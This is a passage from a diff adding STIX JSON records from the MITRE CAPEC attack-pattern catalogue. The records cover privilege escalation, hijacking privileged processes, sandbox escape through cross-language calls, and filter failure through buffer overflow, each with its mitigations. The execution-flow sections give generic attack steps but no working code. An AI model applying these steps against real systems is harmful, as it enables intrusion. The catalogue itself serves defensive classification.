"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2938365a-8b0f-4d54-8471-81ea79d3ef9a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7172552-a553-4ec3-ac05-d847c8f293e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate data against a valid schema or DTD prior to parsing.", + "id": "course-of-action--94c30519-b707-419d-b628-0f08718b908b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a7e323e-7ab6-42f3-a56d-42335147b140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94c30519-b707-419d-b628-0f08718b908b", + "spec_version": "2.1", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.", + "external_references": [ + { + "external_id": "CAPEC-233", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/233.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "external_id": "CWE-1311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1311.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-600", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/03-Testing_for_Privilege_Escalation.html" + } + ], + "id": "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Privilege Escalation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "attack-pattern--9f1d96c7-fcc8-4708-b98d-23f1fd86e07b", + "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9", + "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code.", + "external_references": [ + { + "external_id": "CAPEC-234", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/234.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-648", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html" + } + ], + "id": "attack-pattern--9f1d96c7-fcc8-4708-b98d-23f1fd86e07b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Hijacking a privileged process", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find process with elevated priveleges: The adversary probes for processes running with elevated privileges.

    2. Techniques
    On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
    On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

  1. Find vulnerability in running process: The adversary looks for a vulnerability in the running process that would allow for arbitrary code execution with the privilege of the running process.

    2. Techniques
    Look for improper input validation
    Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.
    Utilize system utilities that support process control that have been inadequately secured

Exploit

  1. Execute arbitrary code: The adversary exploits the vulnerability that they have found and hijacks the running process.

", + "x_capec_prerequisites": [ + "The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", + "external_references": [ + { + "external_id": "CAPEC-235", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/235.html" + } + ], + "id": "attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not have enough distinction from CAPEC-30 : Hijacking a Privileged Thread of Execution. Please refer to CAPEC-30 moving forward.", + "external_references": [ + { + "external_id": "CAPEC-236", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/236.html" + } + ], + "id": "attack-pattern--6616521d-b2f8-49c0-95cd-587eab111f91", + "modified": "2021-10-21T00:00:00.000Z", + "name": "DEPRECATED: Catching exception throw/signal from privileged block", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "external_id": "CAPEC-237", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "external_id": "REF-92", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C" + } + ], + "id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Code in Another Language", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

    2. Techniques
    The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

  2. Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

    3. Techniques
    The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

  1. Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.

    2. Techniques
    The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

  1. Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.

    2. Techniques
    The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.", + "id": "course-of-action--93d2ef31-a689-4f16-bf00-29334bcab36a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8d07f3e-4893-4581-9ddd-565364f55f22", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93d2ef31-a689-4f16-bf00-29334bcab36a", + "spec_version": "2.1", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.", + "id": "course-of-action--223d8fc3-bfd2-4786-917f-9e09d40cd357", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c1bf353f-a708-448c-8b53-22dadacd7c49", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--223d8fc3-bfd2-4786-917f-9e09d40cd357", + "spec_version": "2.1", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.", + "id": "course-of-action--c136203e-0b03-420c-828f-a1e4a8b0534b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9627981c-870d-4aff-a472-cb655535e9f3", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c136203e-0b03-420c-828f-a1e4a8b0534b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Get latest updates for the computer.", + "id": "course-of-action--a6f9e9be-3354-4590-80a2-a451a7d8e128", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22d46b75-55c1-431a-a27b-350b72fa6541", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6f9e9be-3354-4590-80a2-a451a7d8e128", + "spec_version": "2.1", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not appear to be a valid attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-238", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/238.html" + } + ], + "id": "attack-pattern--481983de-2023-47f1-be60-642556a65376", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Using URL/codebase / G.A.C. (code source) to convince sandbox of privilege", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not contain any content and did not serve any useful purpose. Please refer to \"CAPEC-207: removing Important Client Functionality\" going forward.", + "external_references": [ + { + "external_id": "CAPEC-239", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/239.html" + } + ], + "id": "attack-pattern--f7c4e923-3a66-458b-8bfe-bbeeebefe86a", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Subversion of Authorization Checks: Cache Filtering, Programmatic Security, etc.", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).", + "external_references": [ + { + "external_id": "CAPEC-24", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/24.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Filter Failure through Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack.\n ", + "A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.", + "Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey: The attacker surveys the target application, possibly as a valid and authenticated user

    2. Techniques
    Spidering web sites for inputs that involve potential filtering
    Brute force guessing of filtered inputs

Experiment

  1. Attempt injections: Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.

    2. Techniques
    Brute force attack through black box penetration test tool.
    Fuzzing of communications protocols
    Manual testing of possible inputs with attack data.

  2. Monitor responses: Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?

    3. Techniques
    Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.
    Check Log files. An attacker with access to log files can look at the outcome of bad input.

Exploit

  1. Abuse the system through filter failure: An attacker writes a script to consistently induce the filter failure.

    2. Techniques
    DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.
    Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.
    An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Ability to control the length of data passed to an active filter." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.", + "id": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b078701a-fc7f-4782-8328-f24692e8b6f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pre-design: Use a language or compiler that performs automatic bounds checking.", + "id": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operational: Use OS-level preventative functionality. Not a complete solution.", + "id": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5152f113-a2d4-4665-bec3-a45da5d7b399", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use an abstraction library to abstract away risky APIs. Not a complete solution.", + "id": "course-of-action--a8d851ab-8c11-49fb-8bb1-ae0f95175539", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--adcbc9cc-ab6a-4107-bbb0-3c1ad2233710", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8d851ab-8c11-49fb-8bb1-ae0f95175539", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.", + "external_references": [ + { + "external_id": "CAPEC-240", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/240.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "description": "Resource Injection", + "source_name": "OWASP Attacks", + 